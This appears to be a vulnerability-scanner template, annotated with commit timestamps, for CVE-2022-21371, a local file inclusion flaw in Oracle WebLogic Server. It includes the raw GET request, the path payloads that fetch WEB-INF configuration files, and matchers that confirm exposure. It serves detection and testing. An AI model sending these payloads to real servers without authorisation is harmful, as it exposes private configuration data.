2022-01-28 11:29:22 +00:00
id : CVE-2022-21371
info :
2022-03-08 14:58:58 +00:00
name : Oracle WebLogic Server Local File Inclusion
2022-01-28 11:29:22 +00:00
author : paradessia,narluin
severity : high
2022-04-22 10:38:41 +00:00
description : An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are
12.1 .3 .0 .0 , 12.2 .1 .3 .0 , 12.2 .1 .4 .0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.
2022-01-28 11:29:22 +00:00
reference :
2022-03-08 14:58:58 +00:00
- https://www.oracle.com/security-alerts/cpujan2022.html
2022-01-28 11:29:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-21371
2022-02-26 17:18:17 +00:00
- https://gist.github.com/picar0jsu/f3e32939153e4ced263d3d0c79bd8786
2022-01-28 11:29:22 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2022-01-28 11:29:22 +00:00
cve-id : CVE-2022-21371
tags : cve,cve2022,lfi,weblogic,oracle
requests :
- method : GET
2022-02-26 17:18:17 +00:00
raw :
- |+
GET {{path}} HTTP/1.1
Host : {{Hostname}}
2022-01-28 11:29:22 +00:00
2022-02-26 17:18:17 +00:00
payloads :
path :
- .//WEB-INF/weblogic.xml
- .//WEB-INF/web.xml
unsafe : true
2022-01-28 11:29:22 +00:00
stop-at-first-match : true
matchers-condition : and
matchers :
2022-02-26 17:18:17 +00:00
- type : dsl
dsl :
- 'contains(body, "<web-app") && contains(body, "</web-app>")'
- 'contains(body, "<weblogic-web-app") && contains(body, "</weblogic-web-app>")'
condition : or
- type : dsl
dsl :
- 'contains(all_headers, "text/xml")'
- 'contains(all_headers, "application/xml")'
condition : or
2022-01-28 11:29:22 +00:00
- type : status
status :
- 200
2022-03-08 14:58:58 +00:00
# Enhanced by mp on 2022/03/08